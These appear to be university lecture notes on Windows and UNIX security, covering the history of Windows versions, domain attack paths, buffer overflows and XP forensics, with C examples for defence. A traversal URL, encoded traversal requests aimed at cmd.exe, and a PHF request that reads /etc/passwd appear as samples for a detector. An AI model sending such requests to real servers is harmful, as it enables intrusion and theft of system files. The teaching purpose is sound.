SYSTEMS SOFTWARE SECURITY
"Lo! Men have become the tools of their tools." (Henry David Thoreau)
The operating systems on a computer network are among the most vulnerable and most frequently attacked targets. The consumer line of Windows (95, 98 and ME or Millennium Edition, collectively "Windows 9x") is considerably less secure than the Windows NT line (NT, 2000 and XP), because the 9x products still sit on top of MS-DOS and inherit its single-user, no-security design from an era when networking a personal computer was uncommon. The NT line was written from scratch on a new 32-bit kernel, but backward compatibility means that Microsoft continued to produce and support many things that run on the old platforms. For that matter, the initial concept of "windowing" (WIMP: windows, icons, menus and pointers) was not a Microsoft invention at all: it originated at Xerox PARC, Apple popularized it with the Macintosh in 1984, and Microsoft shipped the first version of Windows in 1985. The following version history of major operating systems might be informative:
| Year | Release |
| 1981 | MS-DOS 1.0 (Microsoft's first operating system, shipped with the IBM PC) |
| 1983 | MS-DOS 2.0 (hard disk and subdirectory support) |
| 1984 | Macintosh System 1.0 (breakthrough graphical interface); X Window System project begins at MIT |
| 1985 | Windows 1.0 (a graphical shell on top of MS-DOS, visually similar to the Macintosh) |
| 1987 | Windows 2.0 (a less Macintosh-looking product); OS/2 1.0 (IBM and Microsoft) |
| 1990 | Windows 3.0 (cooperative multitasking of Windows programs, still hosted on DOS) |
| 1991 | Linux (free Unix-like kernel, initially an academic/hobbyist project) |
| 1992 | Windows 3.1 (peripheral sharing, TrueType); OS/2 2.0 (the first 32-bit OS/2) |
| 1993 | Windows NT 3.1 (new 32-bit kernel with no DOS underneath, aimed at servers and business); Windows for Workgroups 3.11 (built-in networking); MS-DOS 6.0 |
| 1994 | Red Hat Linux (package-based Linux distribution); OS/2 Warp |
| August 1995 | Windows 95 (consumer line; no separate DOS installation required, but DOS still underneath) |
| November 1996 | Windows CE (synchronizable mini-OS for palm devices) |
| June 1998 | Windows 98 (FAT32 and large hard drive support) |
| February and September 2000 | Windows 2000 (Windows NT 5.0); Windows ME (the last of the Windows 9x line) |
| March and October 2001 | Mac OS X 10.0 (Unix-based Macintosh OS); Windows XP (Windows NT 5.1) |
| January 2007 | Windows Vista (Windows NT 6.0) |
In this lecture, we will deal primarily with the more recent platforms. From NT to 2000 to XP to Vista, security improvements have been the hallmark of progress, alongside better network support, more stable operation, advanced multitasking, and better user administration. NT, which lacked the driver support (notably for games) that home users wanted, became the primary operating system for business and technical users.
Windows 2000, positioned for business desktops and servers, was built on the Windows NT kernel and is sometimes referred to as Windows NT 5.0. It contains tens of millions of lines of code, mostly C with some C++, a large share of it device drivers. Windows 2000 supports NTFS, requires fewer reboots than NT 4, tracks installed applications so that missing components can be replaced (Windows Installer and Windows File Protection), isolates process memory, encrypts files with the Encrypting File System (EFS), offers Virtual Private Networking (PPTP and L2TP/IPsec) for tunneling into a private LAN over the public Internet, has a customizable interface, and supports high-speed networking and large-bandwidth devices. Windows 2000 Server was a popular product for Microsoft; it shipped with IIS 5.0 and was the platform for the Microsoft BackOffice server suite.
Windows XP (the XP stands for "experience") is based on the Windows NT kernel and the driver model of Windows 2000, and has been a very stable platform. It can change its look (themes), update itself automatically, supports multiple users with fast user switching, integrates digital media, and improves reliability. Product activation ties a retail license to the hardware of one machine, which makes installing the same copy on a second machine difficult, though not impossible. Microsoft claimed it was the most secure Windows to date, citing driver signing, a built-in firewall, and privacy features in the browser and other applications; the practitioner's caveat is that the original Internet Connection Firewall was off by default, and it took Service Pack 2 (2004) to turn the firewall on by default and add Data Execution Prevention. Microsoft's marketing also claimed that XP performs up to 20 percent faster than earlier versions and gets faster with use thanks to its self-tuning prefetcher; treat such numbers as vendor claims.
Windows Vista, known during development by its codename Longhorn, is most visibly distinguished by a completely new graphical interface (Aero). Vista ships with the .NET Framework 3.0, against which developers write applications for its new APIs. It is a considerably more secure platform than XP, with User Account Control, address space layout randomization (ASLR), Data Execution Prevention, mandatory integrity levels for processes, and on 64-bit editions mandatory kernel driver signing and kernel patch protection; these mitigate, but do not eliminate, malware, viruses and buffer overflow exploitation. Despite the security improvements, Vista shipped with a number of bugs and glitches. Probably the first thing users notice are driver problems, for example sound card drivers that stop working, or trouble whenever a peripheral such as a digital camera is attached. Some notable Windows XP features and components were replaced or removed in Windows Vista, including Windows Messenger, the network Messenger Service, HyperTerminal, MSN Explorer and Active Desktop, and NetMeeting was replaced by Windows Meeting Space.
BASIC WINDOWS EXPLOITS (9x)
Early Windows platforms (95/98/ME) mostly required the end-user to be tricked into downloading malicious code from a website, opening an unsafe e-mail attachment, or being socially engineered into changing some setting, because these are true single-user systems with no notion of accounts or privileges on the machine itself. Their file sharing uses share-level security (a password per shared folder or printer) rather than the user-level security (per-account permissions) of NT/2000/XP. Executing remote commands on a Windows 9x system is very hard unless the user lets someone in a back door, though not impossible: the share-level password check in Windows 9x compared only as many bytes as the client sent, so a share password could be brute-forced one character at a time (fixed by Microsoft in 2000). Windows 9x is rarely encountered today, but ME (Millennium Edition) is still common. Windows ME isn't designed for a managed network environment, so we're talking primarily about home users in this section.
Sometimes a 9x user wants to turn on file and print sharing on the company network (say, to print something on the office printer). This is a mistake: file and print sharing should be off for Windows 9x users. It exposes NetBIOS over TCP (port 139) with share passwords as the only protection, and enables hijacking of connections to shared resources such as peripherals. A similar vulnerability exists if the user is tricked into installing and activating the Remote Registry Service. Once such remote management paths are open, the attacker simply installs what is called a back-door trojan on the user's machine, and a number of backdoor client-server programs make this easy. Three of the most common were Back Orifice, NetBus and SubSeven. Back Orifice came from the Cult of the Dead Cow and allowed near-complete control of Win9x systems; NetBus and SubSeven added port scanning as well as more exotic tricks like hijacking the mouse. At the time, back-door trojans were poorly detected by anti-virus programs, and some so-called trojan cleaners installed trojans of their own. Personal firewalls helped, but the platform had so little to build on that nothing seemed to offer much hope. Add-on products opened further holes: Microsoft's Personal Web Server and Symantec's pcAnywhere, which listens by default on TCP port 5631 and UDP port 5632, became common attack portals. On a 9x/ME system running unpatched add-on products, the front door as well as the back door is wide open.
Windows ME ships with resource sharing and the Remote Registry Service turned OFF by default, a good thing, but ME is designed for home users who want to network several computers in the house. With Internet Connection Sharing enabled, the ME machine becomes the router for the household network. This makes it the stepping stone for what is called island hopping: an attacker who compromises the Internet-facing machine pivots from it to every other computer behind it, machines that were never meant to be reachable from outside, and a home with several PCs yields several more machines for the attacker's collection. In short, Win9x/ME systems have gaping holes unless critical security updates and patches are regularly downloaded and installed by the user. Such systems make inviting targets for attackers.
WINDOWS NT/2000/XP EXPLOITS
Many of the artifacts of an attack on a Windows NT/2000/XP system live only in volatile storage: running processes, open network connections, and memory. The investigator therefore captures volatile data before powering the machine down. That does not make forensic duplication of the hard drive unimportant; it only sets the order of collection. The main places to look afterwards are log files, password databases, and unusual or hidden files. Once an attacker gains access to an NT/2000 system, they need to hide their presence and make themselves "invisible" as much as possible, and a rootkit that hooks the operating system can fool even sophisticated forensic software run on the live system. In order to understand sophisticated NT attacks, it's important to understand how NT/2000 security works.
Each NT/2000/XP system comes with built-in accounts and principals: Administrator and Guest on every machine; SYSTEM (LocalSystem), a built-in principal under which services run rather than an account anyone logs on with; IUSR_machinename and IWAM_machinename, created when IIS is installed, for anonymous web and web-application access; TSInternetUser, created by Terminal Services; and krbtgt, which exists only on Active Directory domain controllers. An attacker who can find, steal or guess the password of any real account, or of a service account, is in. NT/2000 clients are notoriously vulnerable to sniffing and snooping through a number of means: malicious web page code, malicious MIME headers in e-mail, newsgroup postings, instant messaging, and trojanized multimedia files played through a media player. XP clients are vulnerable through poorly configured firewalls, spoofed software updates (especially of anti-virus software), raw socket abuse by malware, and plug and play (the UPnP service was remotely exploitable in 2001). Another widely mismanaged area is the PROFILE setup. Most network environments use profiles in addition to logon scripts; profiles give the user the same desktop from machine to machine, including during simultaneous (concurrent) logons by the same user at different machines. A profile has two parts: the user's own profile folder (under Documents and Settings on 2000/XP, under WINNT\Profiles on NT 4), which holds the user's registry hive NTUSER.DAT, desktop, Start menu, application data and the NetHood folder of Network Neighborhood shortcuts; and the All Users folder, whose contents are shared by every account on the machine. There are different types of profile setup. Local profiles are valid only on one computer; when the user moves to another computer, Windows creates a fresh local profile there at first logon. Mandatory profiles (NTUSER.MAN) lock users into a fixed profile; changes last for the current session and are discarded at logoff. Both local and mandatory profiles are, frankly, a bear for users to work with. For this reason, most organizations use ROAMING PROFILES, stored on a server, copied down at logon and back up at logoff, which follow the user from machine to machine in the organization (the profile-side enabler of "hot desking").
One of the problems with roaming profiles is that if the user is logged on at several machines at once, the machine logged off last writes its copy of the profile back to the server and overwrites the changes saved from the others (changes to settings and to the user's registry hive; access rights and privileges live in the security database, not in the profile). Another problem is storage: roaming profiles take up a lot of server space and are sometimes farmed out to departmental servers instead of a central server. A final problem area is the tendency of users to lend their login credentials to someone having login problems: the NT/2000/XP system then attributes everything the second person does to the first person's account, and the audit trail no longer says who did what.
On to DOMAINS, where networked NT/2000/XP computers share a common security database. When a user logs on to a domain-joined computer, the third field of the dialog that appears after Control-Alt-Delete selects the domain. The password itself is never sent: the client proves knowledge of it through a challenge/response exchange (LM/NTLM under NT 4, Kerberos by default in 2000/XP domains) with what is called a DOMAIN CONTROLLER. Under NT 4 one Primary Domain Controller (PDC) holds the writable copy of the accounts database and Backup Domain Controllers (BDCs) hold read-only replicas; any of them can authenticate the user, normally whichever one answers first or is physically or logically closest. NT 4 domain controllers keep the domain's accounts in the SAM (Security Accounts Manager) database, which records every user and group and what they are permitted to do with the domain's resources; Active Directory domain controllers (2000 and later) keep them in the directory, and all of them are writable. Domain controllers are the crown jewels of the network and a sought-after target of attackers. Once a domain controller has been compromised, there is logical access to every other NT/2000/XP machine in the domain, and then it's a matter of seeing the forest through the trees (explained below).
One of the most dangerous attack paths runs through a web server via the IUSR_machinename account, which IIS uses for anonymous web requests. A flaw in the web server or a web application lets the attacker run commands as that account; the attack known as privilege escalation is then the step of turning that low-privileged foothold into membership of Administrators (or at least Power Users) on the host, and from there into a domain-level account. Windows has at least ten built-in groups on a typical installation: Administrators, Power Users, Users, Guests, Backup Operators and Replicator on every machine, plus Server Operators, Account Operators and Print Operators on domain controllers; Authenticated Users is a special identity that every logged-on account belongs to automatically. Other domain properties exist, such as organizational units (containers), which can be exploited, but the attacker is interested in more than one domain. They are usually interested in the whole enterprise, or forest. Active Directory's security boundaries are domains (anything from a handful of machines to tens of thousands), trees (domains sharing a contiguous DNS namespace), and forests (all the trees sharing one schema and global catalog, in practice the organization's whole network). Arrangements between domains are called TRUST relationships, which allow accounts from Domain A to be granted rights in Domain B, for example. On Active Directory domain controllers the account database is %windir%\NTDS\ntds.dit; on every other machine (workstations, member servers, and NT 4 domain controllers) the accounts live in the SAM registry hive under %systemroot%\system32\config. Reading either requires SYSTEM or Administrator rights, and Power Users does not exist on domain controllers. An attacker who reaches Administrator on a domain controller can dump every password hash, inject accounts and hashes of their own, corrupt or delete the database, and lock out the legitimate administrators, preventing recovery of the system. We're talking all-powerful, complete network control, which is very enticing to the many attackers who want to "own a network."
BUFFER OVERFLOWS
The oldest and still commonly encountered attack on an XP system is the buffer overflow exploit. A program that accepts data from a user or another program copies it into storage it has set aside for it, a buffer. Unless the program takes special care to check that the size of the data is less than or equal to the buffer, the incoming data overflows the buffer and overwrites whatever lies next to it in memory. On the stack that is typically the saved return address of the current function, and an attacker who controls it redirects execution to code of their own choosing, supplied in the same input. This is a property of programs written in C and C++ without bounds checking, not of any one operating system: the classic overflows of the 1990s were against UNIX daemons, and Windows has suffered equally. The injected code runs with whatever privileges the vulnerable program has; on Windows that is often LocalSystem for a service or Administrator for the interactive user, which is why the result so often amounts to full control of the machine.
As you can imagine, this flaw creates a wide variety of problems: Denial of Service attacks, remote control, piggybacking, hijacking, proxy bouncing, or zombie floods. The flaw lies not in the XP kernel itself so much as in application programs and services that do not check input lengths. Any network-reachable program that copies attacker-controlled input into a fixed-size buffer is vulnerable from any node on the network, to anyone with zero privileges. Some common exploits include oversized MIME headers in e-mail, malformed graphics files from a visited website, or excessive filler in web page form fields. The "payload" depends upon the ingenuity and creativity of the attacker, but the most common result is a remote command prompt with the privileges of the victim process, often SYSTEM, on the target system. Modern compilers and operating systems add stack canaries (/GS), Data Execution Prevention and ASLR to make this harder, but none of them fixes the missing bounds check. The classic article on the subject is Aleph One's Smashing the Stack for Fun and Profit (Phrack 49, 1996), which has motivated more than one script-kiddie into becoming a programmer. Another classic piece is the Cult of the Dead Cow's The Tao of Windows Buffer Overflow (DilDog, 1998).
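As an added illustration (not code from the lecture or from the papers cited), the following C program models the stack frame that an overflow corrupts. A fixed 16-byte buffer is followed in memory by the saved return address, as on an x86 stack; the layout here is an explicit byte array so the effect is deterministic rather than undefined behaviour. The unchecked copy is the vulnerable pattern (equivalent to strcpy into a local array), the checked copy is the fix, and the payload and the legitimate return address 0x401000 are constructed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   16                    /* the local buffer the program meant to fill  */
#define FRAME_SIZE (BUF_SIZE + 8)        /* buffer plus the 8-byte saved return address */

/* Vulnerable pattern: copy whatever length the caller supplies, exactly as
 * strcpy()/memcpy() without a bounds check do. Bytes 16..23 of a long input
 * land on the saved return address. */
static void copy_unchecked(unsigned char *frame, const unsigned char *in, size_t len)
{
    memcpy(frame, in, len);
}

/* Hardened pattern: refuse input that does not fit and leave the frame untouched. */
static int copy_checked(unsigned char *frame, const unsigned char *in, size_t len)
{
    if (len > BUF_SIZE)
        return -1;                       /* the caller must treat this as a rejected request */
    memcpy(frame, in, len);
    return 0;
}

/* Read back the saved-return-address slot of the model frame. */
static uint64_t saved_return(const unsigned char *frame)
{
    uint64_t ret;
    memcpy(&ret, frame + BUF_SIZE, sizeof ret);
    return ret;
}

/* Build a frame whose return address is 0x401000 (constructed value), feed it
 * the input with the chosen copy routine, and return the slot afterwards. */
uint64_t run_frame(const unsigned char *in, size_t len, int checked)
{
    unsigned char frame[FRAME_SIZE];
    uint64_t legit = 0x401000;
    memset(frame, 0, sizeof frame);
    memcpy(frame + BUF_SIZE, &legit, sizeof legit);
    if (checked)
        (void)copy_checked(frame, in, len);   /* returns -1 for an oversized payload; frame unchanged */
    else
        copy_unchecked(frame, in, len);
    return saved_return(frame);
}

/* Constructed attacker input: 16 bytes of filler, then 8 bytes of 'B' that
 * become the new return address. Returns the slot after the copy. */
uint64_t run_demo(int checked)
{
    unsigned char payload[FRAME_SIZE];
    memset(payload, 'A', BUF_SIZE);
    memset(payload + BUF_SIZE, 'B', FRAME_SIZE - BUF_SIZE);
    return run_frame(payload, sizeof payload, checked);
}

int main(void)
{
    printf("unchecked copy: return address is now 0x%016llx\n",
           (unsigned long long)run_demo(0));   /* 0x4242424242424242 */
    printf("checked copy:   return address still  0x%016llx\n",
           (unsigned long long)run_demo(1));   /* 0x0000000000401000 */
    return 0;
}
```

In a real exploit the eight bytes of 'B' would be the address of the attacker's shellcode, usually placed in the same buffer; the only difference between the two runs is the single length comparison, which is the whole fix.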
OTHER XP ATTACKS
With the notable exception of stolen confidential data, the most common symptom of an intruder messing around with a network (as with malware) is modified, corrupted, or deleted files. Web servers have been a rich source of such intrusions. Early IIS versions would hand over the source of a server-side script, which often contains passwords or database connection strings, if the request appended ::$DATA (the name of an NTFS file's default data stream) to the URL, so the file was read rather than executed. ISAPI DLLs have been particularly vulnerable, the .ida and .printer extension overflows of 2001 (exploited by the Code Red worm) being the best known. From a web page, a technique called File System Traversal backs you out of the web root into the system directories if the server does not canonicalize paths; you need only guess how many folders deep the web root is, and since extra levels past the drive root are ignored, over-guessing costs nothing. This Dot Dot Slash method looks like this: http://www.domain.net/../../../../../../../../winnt/securefile. Another technique, Hex Encoding, evades signature matching in firewall logs and IDS systems that inspect the raw request: spaces, slashes, backslashes and even the dots are replaced with their hexadecimal (percent-encoded) equivalents, such as %20 (space), %2F (slash), %5C (backslash) and %2E (dot). IIS 4 and 5 compounded this by accepting overlong UTF-8 and doubly-encoded forms and decoding them after the security check, which is what the Unicode and Double Decode traversal flaws exploited. The lesson for the defender is to decode the request the same number of times the server does before matching anything against it.
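The decode-then-inspect rule above, as an added example rather than code from the lecture: a small C checker that percent-decodes a request path once, then walks its segments counting how far ".." climbs, treating both / and \ as separators the way a Windows server does. The request strings are constructed; the checker is a simplified model and does not reproduce IIS's own canonicalization order. It also flags control characters, which is how the newline hidden in %0a (the PHF trick discussed later in the UNIX section) would be caught.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;                          /* not a hex digit (also catches the NUL terminator) */
}

/* Decode %XX escapes from `in` into `out` (capacity outlen, NUL-terminated).
 * Returns the decoded length, or -1 on a malformed escape or if it does not fit. */
int url_decode(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in; in++) {
        int c = (unsigned char)*in;
        if (c == '%') {
            int hi = hexval((unsigned char)in[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[2]);
            if (lo < 0) return -1;
            c = hi * 16 + lo;
            in += 2;
        }
        if (n + 1 >= outlen) return -1;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return (int)n;
}

/* Classify an already-decoded path.
 *   0: stays inside the web root
 *   1: a ".." segment climbs above the root (dot-dot-slash traversal)
 *   2: contains a control character, e.g. the newline that %0a hides */
int classify_path(const char *path)
{
    int depth = 0;
    const char *p = path;
    for (const char *q = path; *q; q++)
        if ((unsigned char)*q < 0x20) return 2;
    while (*p) {
        while (*p == '/' || *p == '\\') p++;      /* Windows servers accept both separators */
        const char *seg = p;
        while (*p && *p != '/' && *p != '\\') p++;
        size_t len = (size_t)(p - seg);
        if (len == 0 || (len == 1 && seg[0] == '.'))
            continue;                             /* empty or "." segment: no movement */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (--depth < 0) return 1;            /* more ".." than directories entered */
        } else {
            depth++;
        }
    }
    return 0;
}

/* What a sensible inspection point does: decode once, then classify.
 * Returns -1 for a malformed request, otherwise the classify_path() code. */
int check_request_path(const char *raw)
{
    char buf[512];
    if (url_decode(raw, buf, sizeof buf) < 0) return -1;
    return classify_path(buf);
}

int main(void)
{
    /* constructed sample requests */
    const char *samples[] = {
        "/images/logo.gif",
        "/../../../../../../../../winnt/securefile",
        "/scripts/%2e%2e%2f%2e%2e%2fwinnt/system32/cmd.exe",
        "/scripts/..%5c..%5cwinnt/system32/cmd.exe",
        "/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %s\n", check_request_path(samples[i]), samples[i]);
    return 0;
}
```

A signature that looks for the literal string "../" in the raw request misses the third and fourth samples entirely; decoding first is what makes them visible.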
Browser add-ons (technically BHOs, Browser Helper Objects, for Internet Explorer) represent another vulnerability category, since they run inside the browser with the user's privileges. The website CastleCops kept a master list of such add-ons, separating the good ones from the bad ones. Numerous other vulnerabilities are discussed in many places on the Internet, particularly blogs such as Ed Bott's blog on Windows.
INTRUSION DETECTION ON WINDOWS XP SYSTEMS
Besides the above warnings about volatile data and command-line attacks, a basic analysis of an XP system is possible using only command-line tools (quite often in Safe Mode without networking, once the disk has been imaged). At minimum you want your own trusted copy of cmd.exe and a few programs from the resource kits on removable media, because the tools on the suspect machine may be trojanized. Before the examination, record MD5 (or SHA-1) hashes of your tool set and of every evidence file; known-file hash sets such as the HashKeeper database let you eliminate standard system files from review. Be aware of booby traps. If the desktop shell dies, you can sometimes bring it back by running EXPLORER.EXE from the command line. If local passwords stand in the way, pwdump (run as Administrator) extracts the hashes from the SAM so they can be cracked offline. After recording the date and time stamps and the running processes, open the event logs (Event Viewer, under Administrative Tools in the Control Panel) and analyze them. Next, treat the Registry as an enormous log file, and collect the page file (pagefile.sys) and any special application files (.hst, .tmp, .pst, .log) such as the browser cache, the Recycle Bin, and the printer spool. It's best to use forensic software working from a write-blocked image to extract these: the examination then takes place offline in a controlled environment, which protects you from any allegation that you modified or tampered with the evidence. Keyword string searches are then run over the image with the forensic tool (not Windows Explorer's search, which skips files it cannot index), looking for terms particular to the purpose of your investigation. Pay special attention to encrypted and compressed files.
A final aspect of XP analysis involves attributing activity to accounts, and is used whenever the computer has been used to access network shares, domains, trees or forests without authorization. Here you want to find and examine SIDs (Security Identifiers). A SID uniquely identifies a user, group or computer. Each domain or standalone machine has its own identifier, and each account within it gets a relative identifier; the two combined make up the account's SID. SIDs are stored in the SAM and in Active Directory, and in addition the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList has a subkey named after the SID of every account, local or domain, that has ever logged on interactively to that machine and received a profile (HKEY_USERS shows the ones currently loaded). By comparing the ProfileList entries of different machines with the domain SIDs obtained from the domain controllers, you can find out which accounts from which domains were used on which machines. SIDs look like this:
S-1-5-21-917267712-1342860078-1792151419-500
where S designates it as a SID, 1 is the revision level, 5 is the identifier-authority value (NT Authority), the values from 21 through 1792151419 are the subauthorities (21 marks a domain or machine SID, and the three numbers after it identify that particular domain or machine), and 500 is the relative identifier (RID), which identifies the account within the domain: 500 is always the built-in Administrator and 501 the Guest. The domain identifier, not the RID, is the "domain code". An access token lists all the SIDs a logged-on user carries (the account plus every group it belongs to); the domain controller supplies them once the challenge/response authentication succeeds, so users who authenticate remotely carry them too. A SID therefore ties activity to an account, not to a machine. Proving that an attacker's computer carried out the attack needs the network-side evidence (logon events with source workstation names and addresses), and a sophisticated attacker uses somebody else's machine as a "zombie" or proxy for the attack precisely to muddy that trail.
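A parser for the SID format just described, added here as an example and not part of the lecture: it splits the textual SID into revision, authority and subauthorities, extracts the RID, names the well-known RIDs, and decides whether two SIDs come from the same domain or machine (everything but the last subauthority matches). The first sample SID is the lecture's; the second and third are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SUBAUTH 15                 /* Windows allows at most 15 subauthorities */

struct win_sid {
    unsigned long revision;
    unsigned long long authority;      /* 5 = NT Authority, the usual case */
    unsigned long sub[MAX_SUBAUTH];
    int nsub;
};

/* Parse one decimal field; returns 0 and advances *p on success. */
static int field(const char **p, unsigned long long *val)
{
    char *end;
    if (!isdigit((unsigned char)**p)) return -1;
    *val = strtoull(*p, &end, 10);
    *p = end;
    return 0;
}

/* Parse the textual form "S-R-I-S1-S2-...-Sn". Returns 0 on success, -1 otherwise. */
int parse_sid(const char *text, struct win_sid *sid)
{
    unsigned long long v;
    const char *p = text;
    if (p[0] != 'S' || p[1] != '-') return -1;
    p += 2;
    if (field(&p, &v) != 0 || *p != '-') return -1;
    sid->revision = (unsigned long)v;
    p++;
    if (field(&p, &v) != 0) return -1;
    sid->authority = v;
    sid->nsub = 0;
    while (*p == '-') {
        p++;
        if (sid->nsub == MAX_SUBAUTH || field(&p, &v) != 0) return -1;
        sid->sub[sid->nsub++] = (unsigned long)v;
    }
    return (*p == '\0' && sid->nsub > 0) ? 0 : -1;
}

/* The relative identifier: the last subauthority, naming a principal within its domain. */
unsigned long sid_rid(const struct win_sid *s) { return s->sub[s->nsub - 1]; }

/* True for the S-1-5-21-a-b-c-... form that a domain or standalone machine issues. */
int sid_is_domain_form(const struct win_sid *s)
{
    return s->authority == 5 && s->nsub >= 2 && s->sub[0] == 21;
}

/* Two SIDs come from the same domain/machine when everything but the RID matches. */
int sid_same_domain(const struct win_sid *a, const struct win_sid *b)
{
    if (a->authority != b->authority || a->nsub != b->nsub || a->nsub < 2) return 0;
    return memcmp(a->sub, b->sub, (size_t)(a->nsub - 1) * sizeof a->sub[0]) == 0;
}

/* Well-known RIDs that mean the same thing in every domain. */
const char *sid_rid_name(unsigned long rid)
{
    switch (rid) {
    case 500: return "Administrator";
    case 501: return "Guest";
    case 502: return "krbtgt";
    case 512: return "Domain Admins";
    case 513: return "Domain Users";
    case 514: return "Domain Guests";
    case 519: return "Enterprise Admins";
    default:  return NULL;               /* 1000 and up: ordinary users and groups */
    }
}

int main(void)
{
    struct win_sid a, b;
    const char *admin = "S-1-5-21-917267712-1342860078-1792151419-500";   /* from the lecture */
    const char *user  = "S-1-5-21-917267712-1342860078-1792151419-1001";  /* constructed */
    if (parse_sid(admin, &a) == 0 && parse_sid(user, &b) == 0) {
        printf("%s -> RID %lu (%s)\n", admin, sid_rid(&a), sid_rid_name(sid_rid(&a)));
        printf("same domain as %s: %s\n", user, sid_same_domain(&a, &b) ? "yes" : "no");
    }
    return 0;
}
```

Run over the ProfileList subkey names of several machines, sid_same_domain groups the accounts by the domain that issued them, and sid_rid_name picks out the ones that were built-in Administrator logons regardless of what the account had been renamed to.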
UNIX VULNERABILITIES
UNIX is an operating system that predates the Internet, and is used more widely than people realize. It is associated with the birth of the Internet because the early Internet Service Providers (ISPs) were built on UNIX servers, and because BSD UNIX on DEC VAX hardware was the workhorse of academic networking in the 1980s (DEC's own VAX operating system, VMS, is a separate system and not a UNIX variant). In addition, the military and IBM's server line rely heavily upon UNIX (POSIX-compliant systems and IBM's AIX).
UNIX was developed in 1969 at Bell Labs, the research arm of AT&T (later spun off into Lucent Technologies), and in 1973 was rewritten in C, making it one of the first truly portable operating systems. A 1956 consent decree with the Department of Justice barred AT&T from selling software, so AT&T licensed UNIX cheaply to universities and vendors, the most notable of these being the Department of Computer Science at UC Berkeley, which produced the Berkeley Software Distribution (BSD) from 1977 onward; BSD became free of AT&T code, and freely redistributable, with the Net/2 (1991) and 4.4BSD-Lite (1994) releases. Meanwhile AT&T's own line continued to evolve into UNIX System V, released in 1983 and later maintained by Unix System Laboratories (USL), which Novell bought in 1993. Sun Microsystems' SunOS (early 1980s) was BSD-derived; in 1992 Sun moved to the System V-based Solaris 2, which became a highly successful "flavor" of UNIX. Digital Equipment's Ultrix (1984) was likewise BSD-derived, and its 1992 OSF/1 (later Digital UNIX and Tru64) followed; Digital was sold to Compaq in 1998. Hewlett Packard entered the fray with HP-UX (System V-based), Silicon Graphics produced IRIX (SGI UNIX), and of course the 1990s gave us Linux, a free re-implementation rather than a licensee of the AT&T code. There are well over 80 different "flavors" of UNIX (the Unix Guru Universe site keeps a list). System V derivatives dominate the corporate world, and BSD and Linux the non-corporate world.
As UNIX continues to evolve, all of its versions, variants and flavors move toward POSIX as a common target. POSIX (Portable Operating System Interface, with the X for UNIX) is an IEEE standard (IEEE 1003), not a government creation, although the U.S. government adopted it for procurement as FIPS 151; it is pronounced pahz-icks, not poh-six. POSIX is a series of specifications for the operating system interface (system calls, shell and utilities) that let an application be portable across implementations while still allowing platform-specific parts where they are unavoidable; it is not specific to Open Source or to Microsoft systems, and Windows NT even shipped a minimal POSIX subsystem to qualify for government purchases. The POSIX.1 specification has been around since 1988, and systems that pass the conformance tests are called POSIX-compliant (certified under FIPS 151-2 by NIST, or under the X/Open XPG4 and later Single UNIX Specification branding by The Open Group). Such certifications are an important part of bidding wars when multi-million dollar purchases of overhauled computer systems are made by companies and governments.
The UNIX system is functionally organized at three levels: the kernel, the shell, and the utilities and applications that run on top of them.
The KERNEL controls the hardware and manages processes, memory, devices and file systems. If you ask the computer to list (ls) the files in a directory, the shell runs the ls program, and ls asks the kernel, through system calls, to read the directory from disk; the output then goes to your screen. The SHELL is the command interpreter between the user and the kernel. There are several different shells, most notably the Bourne shell (sh, the original), the C shell (csh, with C-like syntax and job control), the TC shell (tcsh, which adds command-line editing and completion), the Korn shell (ksh, standard on most commercial UNIX installations), and the Bourne Again SHell (bash, the GNU shell and the default on almost every Linux distribution; it is a text-mode shell, not a graphical one). On a commercial UNIX you will most often meet ksh; on Linux and Mac OS X, bash. Typing echo $SHELL prints the user's login shell as recorded in /etc/passwd, which is not necessarily the shell currently running (ps shows that). A user can have more than one shell installed and switch from one to another. A shell can also accept "piped" input from another program rather than from the keyboard, and scripting allows commands to be strung together so that the output of one program becomes the input of another. If you encounter a Linux machine in graphical mode, you can usually switch to a text console with Ctrl-Alt-F2 (and back to the graphical display with Ctrl-Alt-F7).
The basic form of a UNIX COMMAND is command_name -options argument(s). An option is usually preceded by a hyphen and usually consists of a single letter, and most commands accept several single-letter options grouped after one hyphen (ls -la). An argument is typically a file name or other text for the command to operate on. Typing man command_name (man is short for manual) shows the manual page for that command, and man -k keyword (or apropos) searches the manual index; there is no single built-in list of all commands, because most of them are separate programs in /bin and /usr/bin. You can add your own commands by writing shell scripts, which is sometimes called Bourne shell programming.
Several standard DIRECTORIES hang off the root (/) directory. /bin holds the essential commands as binary executables. /dev contains special files that represent devices such as disks, printers and terminals; one of them, /dev/null, is a null (non-existent) device to which UNIX users direct unwanted output. /etc consists of system configuration files (passwd, group, fstab, syslog.conf and the like). /home holds each user's personal directory. /lib contains shared libraries used by various programs. /tmp is a scratch area for storing files on a temporary basis. /usr contains the on-line manual, application programs, and files or directories shared with other users, and /var holds logs, spool directories and other data that changes while the system runs. Systems also have /sbin (administrative commands) and, on Linux, /proc (a live view of running processes and kernel state).
In order to survive in the UNIX world, users must remember three things:
- Case matters: elsewhere abc and ABC usually mean the same thing; in UNIX they are different names.
- rm * removes every file in the current directory without asking whether you really meant it.
- In C (and in shell arithmetic) == tests equality and = assigns. So count=0 doesn't test whether count equals zero, it assigns 0 to count. This is among the most common C programming mistakes.
For example, grep searches the named files for a string (case-sensitively unless told otherwise with -i) and prints each matching line prefixed with its file name:
$ grep suck *
cutiepie.txt: so then I told everyone about the suck as I smiled
weekendstory01.doc: as far as things go, it sucked worse that others
In most UNIX systems you can also type the following commands to obtain information about suspicious events:
| Command | Displayed Information |
| who | who is logged in now (from utmp) |
| last | login/logout history (from wtmp) |
| acctcom (or lastcomm) | commands users have executed (process accounting) |
| ps | current processes |
